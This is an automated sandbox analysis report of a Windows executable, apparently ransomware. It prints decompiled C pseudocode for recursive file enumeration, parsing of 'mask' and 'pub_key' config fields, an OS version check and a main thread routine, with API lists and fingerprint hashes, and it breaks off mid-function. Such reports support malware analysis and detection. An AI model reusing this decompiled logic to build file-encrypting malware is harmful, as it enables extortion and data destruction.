Yara matches

Similarity

API ID: AddressAllocateFreeHandleInitializeModuleProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 3309497720-1888249752
Opcode ID: 669f028598699ec8c7e04a2b4b4d9e463f9f5b82d38373e5101831f563b5b855
Instruction ID: 20715cd65775a414428025a7b6d4829539e61f084efa534a52fb62a53d660c64
Opcode Fuzzy Hash: 669f028598699ec8c7e04a2b4b4d9e463f9f5b82d38373e5101831f563b5b855
Instruction Fuzzy Hash: A6F03C30A8020DBBDB009BE5EC0AFAE777CEB08712F0045C4F904E6181E67466158E95

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6D09 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0FBC6D09() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0FBC6950(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0FBC6C90(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x0fbc6d10
0x0fbc6d24
0x0fbc6d48
0x0fbc6d51
0x0fbc6d82
0x0fbc6d8d
0x0fbc6d8f
0x0fbc6d92
0x0fbc6d95
0x0fbc6d97
0x0fbc6da0
0x0fbc6da0
0x0fbc6da3
0x0fbc6da3
0x0fbc6d99
0x0fbc6d9c
0x0fbc6d9e
0x00000000
0x00000000
0x0fbc6d9e
0x0fbc6d97
0x0fbc6d53
0x0fbc6d67
0x0fbc6d6c
0x0fbc6db0
0x0fbc6db0
0x0fbc6dc3
0x0fbc6dce
0x0fbc6ddc

APIs

lstrcmpW.KERNEL32(?,0FBCFEC8,?,?), ref: 0FBC6D1C
lstrcmpW.KERNEL32(?,0FBCFECC,?,?), ref: 0FBC6D36
lstrcatW.KERNEL32(00000000,?), ref: 0FBC6D48
lstrcatW.KERNEL32(00000000,0FBCFEFC), ref: 0FBC6D59

Part of subcall function 0FBC6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBC6CC3
Part of subcall function 0FBC6C90: lstrcatW.KERNEL32(00000000,0FBCFEC4), ref: 0FBC6CDB
Part of subcall function 0FBC6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBC6CE5

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FBC6DBD
FindClose.KERNEL32(00003000,?,?), ref: 0FBC6DCE

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: ba060cde93f8eb1b719529762300bd4d6eb23f0aaf75780e4b70778b350c72fa
Instruction ID: f3e64c98ae849ff43635e46c5b5ff7e08445e80eecf878f9c05022fc6f00b0a5
Opcode Fuzzy Hash: ba060cde93f8eb1b719529762300bd4d6eb23f0aaf75780e4b70778b350c72fa
Instruction Fuzzy Hash: 75012131A0021EAACB119B65EC48FEF7BB9EF48651F0040E9F949D6021DB359A519FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3200 Relevance: 8.8, APIs: 7, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC3200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x0fbc3205
0x0fbc3208
0x0fbc320a
0x0fbc320e
0x0fbc321f
0x0fbc321f
0x0fbc3223
0x00000000
0x0fbc3225
0x0fbc3226
0x0fbc322a
0x0fbc3230
0x0fbc3235
0x0fbc3239
0x00000000
0x00000000
0x0fbc323b
0x00000000
0x0fbc3239
0x0fbc3245
0x0fbc3245
0x0fbc3248
0x0fbc3248
0x0fbc324e
0x0fbc3270
0x0fbc3273
0x0fbc3284
0x0fbc328a
0x00000000
0x0fbc328a
0x0fbc3250
0x0fbc3251
0x0fbc3262
0x0fbc3268
0x0fbc328d
0x0fbc328f
0x0fbc3293
0x0fbc3293
0x0fbc328f
0x0fbc3299
0x0fbc32a5
0x0fbc32a5
0x0fbc3210
0x0fbc3210
0x0fbc3214
0x0fbc3217
0x00000000
0x0fbc3219
0x0fbc3219
0x0fbc321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc321d
0x00000000
0x0fbc3217
0x0fbc323e
0x0fbc3242
0x0fbc3242
0x00000000

APIs

lstrlenA.KERNEL32(0FBC52F0,00000000,?,0FBC52F1,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3251
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC325B
HeapAlloc.KERNEL32(00000000,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3262
lstrlenA.KERNEL32(0FBC52F0,00000000,?,0FBC52F1,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3273
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC327D
HeapAlloc.KERNEL32(00000000,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3284
lstrcpyA.KERNEL32(00000000,0FBC52F0,?,0FBC34BF,0FBC52F1,00000001,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3293

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID:
API String ID: 511007297-0
Opcode ID: 7af34cbc571a2fda1e99d7c6d42723ac401ceafb3da176418939d429aed38411
Instruction ID: 31f4ff14c73a10a73981d25940c4d683fb37666ecae25f4e043b50d2d2658142
Opcode Fuzzy Hash: 7af34cbc571a2fda1e99d7c6d42723ac401ceafb3da176418939d429aed38411
Instruction Fuzzy Hash: A211B4300042486EDF202E69A4087A7BB9CEF07721FD8C0CAE8C5CF202C63994578FE1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC33E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBC33E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0FBC32B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0FBC3320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0FBC3190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0FBC3200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x850f00e8
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x0fbc33e3
0x0fbc33e5
0x0fbc33e9
0x0fbc33eb
0x0fbc33ee
0x0fbc33f1
0x0fbc33f8
0x0fbc34db
0x0fbc34db
0x0fbc3410
0x0fbc3425
0x0fbc342b
0x0fbc342f
0x00000000
0x0fbc3431
0x0fbc3432
0x0fbc3434
0x0fbc343a
0x0fbc3441
0x0fbc3444
0x0fbc344a
0x0fbc344b
0x0fbc34ba
0x0fbc344d
0x0fbc344e
0x0fbc3450
0x0fbc3452
0x0fbc3456
0x0fbc3467
0x0fbc3467
0x0fbc346b
0x0fbc346d
0x0fbc3471
0x0fbc3473
0x0fbc3478
0x0fbc347c
0x00000000
0x00000000
0x0fbc347e
0x00000000
0x0fbc347c
0x0fbc3480
0x0fbc3480
0x0fbc3483
0x0fbc3484
0x0fbc3495
0x0fbc349e
0x0fbc34a3
0x0fbc34a7
0x0fbc34a7
0x0fbc34ad
0x0fbc34b0
0x0fbc34b0
0x00000000
0x0fbc3458
0x0fbc345c
0x0fbc345f
0x00000000
0x0fbc3461
0x0fbc3461
0x0fbc3465
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc3465
0x00000000
0x0fbc345f
0x0fbc3458
0x0fbc3456
0x0fbc344e
0x0fbc344b
0x0fbc3444
0x0fbc34bf
0x0fbc34bf
0x0fbc34bf
0x0fbc34c2
0x0fbc34c3
0x0fbc34d6
0x0fbc34d6
0x0fbc3412
0x0fbc3412
0x0fbc3418
0x0fbc3422
0x0fbc3422

APIs

Part of subcall function 0FBC32B0: lstrlenA.KERNEL32(?,00000000,?,0FBC52F0,?,?,0FBC33F6,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC32C5
Part of subcall function 0FBC32B0: lstrlenA.KERNEL32(?,?,0FBC33F6,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC32EE

lstrlenA.KERNEL32(0FBC52F1,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC3484
GetProcessHeap.KERNEL32(00000008,00000001,?,0FBC52F0,00000000), ref: 0FBC348E
HeapAlloc.KERNEL32(00000000,?,0FBC52F0,00000000), ref: 0FBC3495
lstrcpyA.KERNEL32(00000000,0FBC52F1,?,0FBC52F0,00000000), ref: 0FBC34A7
ExitProcess.KERNEL32 ref: 0FBC34DB

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: 012875b84d83b317b47d3151172482e59fe536a0836dd101fc1ebf14a1156baa
Instruction ID: 9eba2743d1bdaef6689541a08085d30c778acb70889160cfe58fa9bbc01cab38
Opcode Fuzzy Hash: 012875b84d83b317b47d3151172482e59fe536a0836dd101fc1ebf14a1156baa
Instruction Fuzzy Hash: A331F1305042455AEB221F28B4447E7BBE9DB06710FDCC1CDE885CB283D62E68878FE1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3B20 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0FBC3B72
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FBC3B96
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FBC3B9A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FBC3B9E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBC3BC5

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: d4a00852a5cebd6500a794b04d38fe07c6b5458cadd0c099c6ee8b0f7eeccf53
Instruction ID: ad3f01d89b05b189f03bf8fb0168701193ebd1d88d03ca692e0f248f4a34ac48
Opcode Fuzzy Hash: d4a00852a5cebd6500a794b04d38fe07c6b5458cadd0c099c6ee8b0f7eeccf53
Instruction Fuzzy Hash: 28111EB0D4031C6EEB609F65DC1ABEB7ABCEB08700F0081D9A548E71C1D6B95B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC4CD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBC4CD0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xfbcfa84]");
				_t16 =  *0xfbcfa8c; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x0fbc4cd6
0x0fbc4cde
0x0fbc4ce4
0x0fbc4ce9
0x0fbc4cec
0x0fbc4cf1
0x0fbc4cf6
0x0fbc4cf9
0x0fbc4d4a
0x0fbc4d4c
0x00000000
0x0fbc4d4e
0x0fbc4d52
0x0fbc4d8f
0x0fbc4d91
0x00000000
0x0fbc4d93
0x0fbc4d9d
0x0fbc4da0
0x0fbc4da0
0x0fbc4da4
0x00000000
0x00000000
0x0fbc4daa
0x0fbc4daa
0x0fbc4dad
0x0fbc4db0
0x0fbc4db0
0x0fbc4db4
0x00000000
0x00000000
0x0fbc4dbe
0x0fbc4dbe
0x00000000
0x0fbc4dba
0x0fbc4dbc
0x00000000
0x00000000
0x0fbc4dc5
0x0fbc4dd4
0x00000000
0x0fbc4dd4
0x0fbc4db0
0x0fbc4d54
0x0fbc4d54
0x0fbc4d58
0x0fbc4d5f
0x0fbc4d61
0x0fbc4d61
0x0fbc4d66
0x0fbc4d7f
0x0fbc4d82
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc4d68
0x0fbc4d68
0x0fbc4d68
0x0fbc4d6c
0x00000000
0x00000000
0x0fbc4d75
0x0fbc4d77
0x00000000
0x0fbc4d79
0x0fbc4d79
0x0fbc4d7d
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc4d7d
0x00000000
0x0fbc4d77
0x00000000
0x0fbc4d68
0x00000000
0x0fbc4d84
0x0fbc4d84
0x0fbc4d87
0x0fbc4d88
0x0fbc4d89
0x0fbc4d8d
0x00000000
0x0fbc4d58
0x0fbc4d52
0x0fbc4cfb
0x0fbc4cfb
0x0fbc4cff
0x0fbc4d35
0x0fbc4d49
0x0fbc4d01
0x0fbc4d03
0x0fbc4d05
0x0fbc4d05
0x0fbc4d09
0x0fbc4d27
0x0fbc4d2a
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc4d0b
0x0fbc4d10
0x0fbc4d10
0x0fbc4d14
0x00000000
0x00000000
0x0fbc4d1d
0x0fbc4d1f
0x00000000
0x0fbc4d21
0x0fbc4d21
0x0fbc4d25
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc4d25
0x00000000
0x0fbc4d1f
0x00000000
0x0fbc4d10
0x00000000
0x0fbc4d2c
0x0fbc4d2c
0x0fbc4d2f
0x0fbc4d30
0x0fbc4d31
0x00000000
0x0fbc4d05
0x0fbc4cff
0x00000000

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0FBC5034), ref: 0FBC4D3D
lstrlenA.KERNEL32(00000000,?,0FBC5034), ref: 0FBC4D97
lstrcpyA.KERNEL32(?,?,?,0FBC5034), ref: 0FBC4DC8

Strings

fabian wosar <3, xrefs: 0FBC4D35

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: 0620d4b01e6fc7fd3c086fb2c035bba8e5e642a14b2a4ad6778c254874af808a
Instruction ID: 24584d7ff85e11bb3231f08bb5c8fe626eeeb465f9401ee0ddeaf992eb725907
Opcode Fuzzy Hash: 0620d4b01e6fc7fd3c086fb2c035bba8e5e642a14b2a4ad6778c254874af808a
Instruction Fuzzy Hash: F331D221A08299DACB32EE2874303FBBFB6EF47511B9855CDC8D15B207D2216E468FD0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC3190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x0fbc3193
0x0fbc3197
0x0fbc319c
0x0fbc31b0
0x0fbc31b9
0x0fbc31ce
0x0fbc31d1
0x0fbc31d9
0x0fbc31e1
0x0fbc31e4
0x0fbc31e9
0x0fbc31a0
0x0fbc31a0
0x0fbc31a0
0x0fbc31a4
0x00000000
0x00000000
0x0fbc31a8
0x0fbc31ec
0x00000000
0x0fbc31aa
0x0fbc31aa
0x0fbc31ae
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc31ae
0x00000000
0x0fbc31a8
0x0fbc31f5
0x0fbc31f5
0x00000000

APIs

lstrcmpiA.KERNEL32(0FBC52F0,mask,0FBC52F1,?,?,0FBC3441,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC31B9
lstrcmpiA.KERNEL32(0FBC52F0,pub_key,?,0FBC3441,0FBC52F1,00000000,00000000,77296980,?,?,0FBC52F0,00000000), ref: 0FBC31D1

Strings

pub_key, xrefs: 0FBC31BF
mask, xrefs: 0FBC31B1

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: a831aaba155606a8dab01d83c353a1a296d4bd6300b07491493f702842411650
Instruction ID: e9fc068ad1862e8ca3f422b07e9cfae03c352226274c44cfdbd7b97709b10d25
Opcode Fuzzy Hash: a831aaba155606a8dab01d83c353a1a296d4bd6300b07491493f702842411650
Instruction Fuzzy Hash: EEF04C713082881EF7154968BC457E3BBCDDB05B50FC840FFF6C5C6152C1AA98418BD4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wjaoab.exePID: 2888, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	693
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0FBC4950 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC4950() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0FBC4600(_t90, _t106); // executed
				if(_t54 == 0) {
					_v8 = CreateThread(0, 0, E0FBC2D30, 0, 0, 0);
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8);
					}
					E0FBC46F0();
					E0FBC40E0(_t90, _t106);
					E0FBC6420( &_v80);
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0FBC63D0( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0FBC4930(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0FBC5880(_v28, _v44, _v40, _v36,  &_v16);
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
